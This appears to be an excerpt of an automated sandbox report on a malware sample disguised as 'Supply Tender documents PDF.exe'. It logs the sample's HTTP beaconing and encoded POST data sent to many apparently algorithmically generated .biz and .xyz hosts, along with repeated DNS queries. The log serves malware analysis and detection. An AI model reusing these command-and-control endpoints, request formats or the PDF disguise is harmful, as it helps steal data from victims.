6c 79 5a 4c 7a 43 74 4d 55 4e 37 55 4c 65 51 46 30 2f 75 58 31 57 6d 70 4c 53 72 56 2f 51 39 6e 35 67 4b 30 50 62 70 50 66 44 4b 39 33 71 67 57 6e 71 63 56 5a 59 44 42 52 67 49 4a 77 33 62 42 64 57 64 7a 62 47 37 46 79 38 48 54 30 59 4d 77 46 77 35 52 43 4a 46 35 2f 6e 7a 30 6c 4c 35 4c 67 68 65 4c 71 45 71 44 73 66 42 66 53 4e 65 33 78 47 43 58 58 6f 71 75 41 66 57 4d 76 58 6a 68 57 4b 58 50 65 6f 79 39 76 44 2f 53 68 4b 31 51 38 4b 56 2b 73 61 31 6c 54 41 45 56 72 64 65 74 33 75 38 75 68 76 49 53 63 4e 43 2b 6c 74 48 65 4a 33 36 61 30 4d 2f 63 6d 32 70 67 6e 79 44 43 59 53 4c 48 49 58 61 31 35 73 67 48 31 64 69 67 71 38 59 32 46 6f 55 6d 78 66 75 4c 4f 70 73 30 31 46 55 6c 32 77 47 4c 6a 56 68 64 44 45 38 57 77 51 52 79 74 66 47 5a 61 58 43 43 52 46 34 72 7a 79 4f 2b 42 4a 30 77 44 72 63 63 66 2b 68 6b 70 67 37 42 64 4f 56 37 55 62 51 6d 43 61 43 37 6f 77 33 6c 5a 4e 6b 4a 52 4e 4c 48 71 43 43 7a 37 69 68 47 34 56 7a 61 56 75 4d 71 37 61 5a 61 36 77 35 36 51 66 61 42 35 4e 2b 46 46 77 47 41 55 64 43 4e 67 41 6e 38 70 39 32 71 51 65 67 59 5a 32 63 5a 31 45 4d 2b 44 54 54 69 54 30 4a 62 56 5a 4c 31 45 77 4a 47 33 66 6c 78 49 50 67 44 68 5a 4b 61 70 68 72 74 31 67 2b 50 6d 61 48 31 42 57 49 78 48 6e 44 6a 69 68 6d 30 2b 39 32 39 46 2b 55 4b 63 72 31 4b 57 43 50 6e 37 45 7a 66 47 6f 6c 75 38 35 31 43 54 50 32 52 61 67 71 58 51 65 34 43 33 70 53 74 4e 42 6f 75 32 68 49 4c 54 64 45 4a 44 6a 41 66 6f 2b 68 59 47 61 76 58 50 4b 46 51 2b 75 37 4d 41 50 6f 75 36 53 55 70 6b 5a 59 63 70 75 57 47 4e 73 52 73 71 69 6c 65 46 48 62 2b 38 37 4b 65 59 76 2f 44 30 7a 4a 72 6a 79 7a 2f 62 76 6d 7a 4a 32 41 36 2b 67 52 4f 52 67 41 51 4f 2b 47 67 64 61 73 43 73 59 69 58 61 39 6f 57 70 37 62 70 75 64 6c 61 45 73 65 75 58 30 69 6a 6a 37 41 6a 79 4a 73 56 4c 58 44 45 77 30 41 50 64 6d 73 55 77 54 35 56 66 4c 45 77 7a 61 69 75 45 75 4b 4b 65 30 65 70 4b 32 72 64 4a 2f 53 39 46 77 4a 6e 33 50 44 6d 43 30 4c 70 76 54 4e 39 42 74 49 30 52 35 64 49 50 4a 49 45 71 52 32 56 39 73 55 44 4c 62 4c 7a 66 72 31 34 6c 57 77 51 42 30 31 54 32 6b 31 37 2b 6f 4f 51 77 38 6a 53 36 66 64 47 49 56 41 6a 33 30 53 44 45 4b 71 57 53 62 31 32 74 35
Source: global traffic	HTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /pjhebutwi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xccjj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /dccoijpopd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hehckyov.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: GET /bguu/?SBX=wpZ2zrhVCI3JLgG0fmBBss6LPjHlWe1w/JFFDzKF+V7h32CQ3OMTdOkGE8NCHKIXe6YEJzSxYnSm/JZ2Z7T7gNAl4zG8Smso5QFplpDKnUXP2BcIMSrtmpg=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.agistaking.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: POST /bxebyxjvvcri HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rynmcq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /cpvjcpjkpbjnm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uaafd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 850
Source: global traffic	HTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 200Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 6f 71 4f 76 61 72 57 4c 4a 34 44 68 6a 72 43 2b 75 57 4d 6a 7a 63 2f 32 72 63 78 54 53 56 4d 74 59 48 4b 48 67 7a 37 73 34 4f 76 30 4c 38 76 38 41 39 58 73 76 76 51 65 52 6d 4b 53 6e 51 35 4c 35 62 37 74 65 72 58 4c 68 71 4d 31 55 44 31 30 4b 70 78 47 76 61 64 34 54 50 73 57 79 43 47 67 6d 55 30 50 42 76 33 45 44 37 77 50 44 65 79 73 2f 48 2f 4e 65 54 4c 6b 68 74 33 75 39 34 36 55 67 6a 69 74 32 48 6a 6b 74 49 55 70 52 77 6f 51 6e 65 33 4a 6b 78 36 47 4d 6b 42 56 64 6d 57 57 75 41 6e 74 4a 58 6d 49 6d 4d 71 41 38 76 65 68 2f 63 64 55 56 50 64 6d 38 38 38 72 30 35 6d 43 45 77 3d 3d Data Ascii: SBX=oqOvarWLJ4DhjrC+uWMjzc/2rcxTSVMtYHKHgz7s4Ov0L8v8A9XsvvQeRmKSnQ5L5b7terXLhqM1UD10KpxGvad4TPsWyCGgmU0PBv3ED7wPDeys/H/NeTLkht3u946Ugjit2HjktIUpRwoQne3Jkx6GMkBVdmWWuAntJXmImMqA8veh/cdUVPdm888r05mCEw==
Source: global traffic	HTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 220Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 6f 71 4f 76 61 72 57 4c 4a 34 44 68 6c 2b 53 2b 73 78 51 6a 37 63 2f 31 76 73 78 54 4c 6c 4d 70 59 48 4f 48 67 79 50 38 35 36 44 30 4c 5a 4c 38 42 38 58 73 73 76 51 65 65 47 4c 35 71 77 35 41 35 62 33 66 65 70 44 4c 68 71 49 31 55 47 52 30 4e 61 70 48 74 4b 64 32 4b 66 73 55 32 43 47 67 6d 55 30 50 42 76 6a 69 44 37 6f 50 43 74 71 73 2f 6c 62 4b 58 7a 4c 6e 32 64 33 75 33 59 36 51 67 6a 69 4c 32 43 37 43 74 4f 51 70 52 31 45 51 6b 4b 44 4b 75 78 36 41 44 45 42 44 65 6b 2f 39 6f 46 43 78 55 31 37 6f 70 4d 32 35 30 4a 54 37 75 74 38 44 48 50 35 56 68 37 31 66 35 36 62 4c 66 34 65 37 4b 2f 7a 53 41 65 39 4b 30 37 59 6d 62 4b 77 49 46 6d 77 3d Data Ascii: SBX=oqOvarWLJ4Dhl+S+sxQj7c/1vsxTLlMpYHOHgyP856D0LZL8B8XssvQeeGL5qw5A5b3fepDLhqI1UGR0NapHtKd2KfsU2CGgmU0PBvjiD7oPCtqs/lbKXzLn2d3u3Y6QgjiL2C7CtOQpR1EQkKDKux6ADEBDek/9oFCxU17opM250JT7ut8DHP5Vh71f56bLf4e7K/zSAe9K07YmbKwIFmw=
Source: global traffic	HTTP traffic detected: POST /9x20/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brHost: www.publicblockchain.xyzOrigin: http://www.publicblockchain.xyzCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 6476Referer: http://www.publicblockchain.xyz/9x20/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36Data Raw: 53 42 58 3d 6f 71 4f 76 61 72 57 4c 4a 34 44 68 6c 2b 53 2b 73 78 51 6a 37 63 2f 31 76 73 78 54 4c 6c 4d 70 59 48 4f 48 67 79 50 38 35 37 58 30 4c 4c 44 38 4f 2f 76 73 74 76 51 65 41 57 4c 36 71 77 35 42 35 59 48 62 65 70 4f 30 67 59 4d 31 53 51 74 30 4b 34 78 48 7a 4b 64 32 4d 66 74 64 67 43 47 71 6d 55 6c 45 42 76 33 69 44 36 45 50 43 74 71 73 2f 33 2f 4b 65 44 4c 66 32 64 33 77 35 34 36 55 67 6a 69 74 32 47 4c 53 73 2b 77 70 57 56 55 51 6c 2f 33 4b 73 52 36 43 45 45 41 41 65 6b 6a 38 6f 42 57 66 55 78 2b 76 70 34 36 35 78 66 36 30 36 50 30 62 62 73 46 58 33 38 4d 35 69 4a 50 32 62 4c 57 43 47 61 76 50 56 62 63 68 30 35 6b 72 45 72 51 34 61 52 52 75 4f 45 46 55 33 43 6a 43 56 67 58 66 45 36 69 35 46 54 71 78 56 66 71 47 34 41 37 45 69 39 48 4a 63 37 37 56 6d 59 48 66 31 41 39 63 59 55 69 70 2b 4a 52 38 4d 2b 51 66 66 44 51 67 6b 7a 6d 78 4a 75 53 36 59 35 67 52 67 4b 30 31 30 37 6b 31 2b 69 72 50 37 65 77 36 64 50 2f 50 52 69 36 58 54 61 48 77 39 38 70 49 54 6d 35 68 35 76 48 74 36 55 63 63 45 67 43 30 73 61 52 53 4f 49 61 4c 42 73 51 47 74 62 2b 72 53 73 49 32 49 4a 34 48 48 2b 4f 61 77 55 54 5a 38 69 6f 33 6a 37 47 57 61 77 39 7a 43 7a 35 43 39 32 61 63 30 7a 6b 63 51 73 49 58 55 55 66 4b 77 76 50 66 34 68 4e 49 68 33 4e 41 74 47 61 41 63 68 49 62 7a 54 34 7a 74 34 50 4d 62 4a 63 69 76 5a 58 53 68 63 71 4a 77 70 78 52 76 58 67 33 41 4d 42 42 4c 35 32 63 74 73 65 63 56 78 56 36 55 68 4d 75 33 4b 6b 64 6b 65 76 64 59 64 59 35 70 53 6a 41 77 39 30 32 69 45 75 61 63 79 64 52 50 66 5a 79 46 37 64 4f 36 74 78 56 72 78 57 54 75 77 51 76 50 63 56 37 6e 64 72 57 47 76 46 71 65 5a 6b 56 43 54 67 2f 33 2b 30 33 63 39 65 2f 36 79 56 52 47 75 42 62 6e 77 4e 34 32 33 55 30 70 5a 31 53 64 6e 2f 30 44 77 6c 58 6b 77 63 67 59 33 33 5a 43 46 68 79 44 47 30 34 6a 57 45 7a 63 44 64 69 54 4b 5a 7a 35 58 2b 6f 72 69 37 52 6c 65 61 4e 57 32 6e 4a 38 4e 62 5a 43 59 39 52 33 52 50 48 70 44 67 48 44 68 4c 5a 44 71 6d 37 48 4d 39 6f 65 38 57 63 6a 6f 32 66 43 42 51 73 74 4e 6d 56 4e 65 41 70 79 67 44 47 6b 6e 58 49 74 38 31 42 65 56 4a 46 67 43 38 36 55 75 63 69 4f 71 38 73 73 6f 45 51 59 4d 61 2b 63 36 45 50 78 31 6c 33 49 2f 76 6c 7a 6f 6c 42 66 78 51 65 65 4c 30 6e 50 55 62 55 70 72 35 30 44 77 6a 49 4a 5a 43 4c 34 7a 64 51 4e 68 52 6a 47 6d 43 68 6d 43 48 56 6f 31 48 72 67 77 38 77 4b 37 2b 46 4e 46 79 4a 4b 42 52 67 69 6f 72 2b 35 4c 33 4c 53 79
Source: global traffic	HTTP traffic detected: GET /9x20/?SBX=lomPZfbkX5/Tg+6jmw8dyMDkjP4NXk0abi78pjf9+/jRa8r0UKnkgOsbdV67hnlDhoKnZ5+zibRYdRwwM6kGhJJ3GpxF1D+e7zNnDN/YPp88POfC8mTtY1w=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

0_2_004722EE

Source: global traffic	HTTP traffic detected: GET /xgeytf?usid=18&utid=30329236071 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /afiiabxhlnglh?usid=18&utid=30329236284 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.przvgke.biz
Source: global traffic	HTTP traffic detected: GET /j422/?lr9=2FpdhzjhhJt&SBX=FUOfllrMHRVlL2mP9dpFtlJ7w5e63t2rBG4iChoHy9jO0xa6Gzw56eLBxdOIk/dIKvPqMZj+oWY7sauAPMCxWZArGu+MyfyU7LQKnbq/Om18e125mnYqe98= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.minimalbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /xekypngstqrnaewh?usid=18&utid=30329248424 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /ldffypnuwfixybeu?usid=18&utid=30329248680 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
Source: global traffic	HTTP traffic detected: GET /pyxq/?SBX=voi6TgACTnyN5gbZYmU17u0h/VvpkraiSkSL1M3zbYGOCvXanSp74LpL3h0aAKQshQlyQ1kby8ogou9zAffBNKdsiowaI9GRahkqR5DXE2LnsscTpBmnflg=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.deepwork.cafeConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /4udu/?lr9=2FpdhzjhhJt&SBX=QPOxO2JOSBeIkdRIJ7kHfEfpa4SAwF/WxXvhpqosjTHM3PFGv2TE4R55nnK/GVLmYbqeoCZ32Sz0NtXBeMrpNSAZ0hCamPuf4pMsJIkclL+7GyT0E55kVqE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dresses-executive.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /7bzp/?SBX=aR6WdwHaaPmew49IGl9c2CyrORGhdUxKRjpfDDDEmaIVpXDnsjMmJ0s7T5q7/mJAEyjBMk5h7mx5tXd7udb6EMTlIvch2q9+PHlpJuVOHss5uOhsYNovhdM=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dappbtc.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gwo6/?SBX=MBEKEv0ugpgWX2jua16KbRtCIB3s6ka+zKgBsYRR8c9E1EzqhBu48/qzeTOQx3bSOlhdcb/rXf0aputkyH2GEaaTMgSCSx6h1rRpE7wz+fc0QC+fndBMDtU=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.stakemask.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /bguu/?SBX=wpZ2zrhVCI3JLgG0fmBBss6LPjHlWe1w/JFFDzKF+V7h32CQ3OMTdOkGE8NCHKIXe6YEJzSxYnSm/JZ2Z7T7gNAl4zG8Smso5QFplpDKnUXP2BcIMSrtmpg=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.agistaking.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /9x20/?SBX=lomPZfbkX5/Tg+6jmw8dyMDkjP4NXk0abi78pjf9+/jRa8r0UKnkgOsbdV67hnlDhoKnZ5+zibRYdRwwM6kGhJJ3GpxF1D+e7zNnDN/YPp88POfC8mTtY1w=&lr9=2FpdhzjhhJt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.publicblockchain.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 UBrowser/5.4.4237.1024 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: www.minimalbtc.xyz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww7.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: ww12.fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: www.deepwork.cafe
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: www.dresses-executive.sbs
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic	DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic	DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic	DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic	DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic	DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic	DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic	DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic	DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic	DNS traffic detected: DNS query: gcedd.biz
Source: global traffic	DNS traffic detected: DNS query: www.dappbtc.xyz
Source: global traffic	DNS traffic detected: DNS query: www.stakemask.xyz
Source: global traffic	DNS traffic detected: DNS query: www.agistaking.xyz
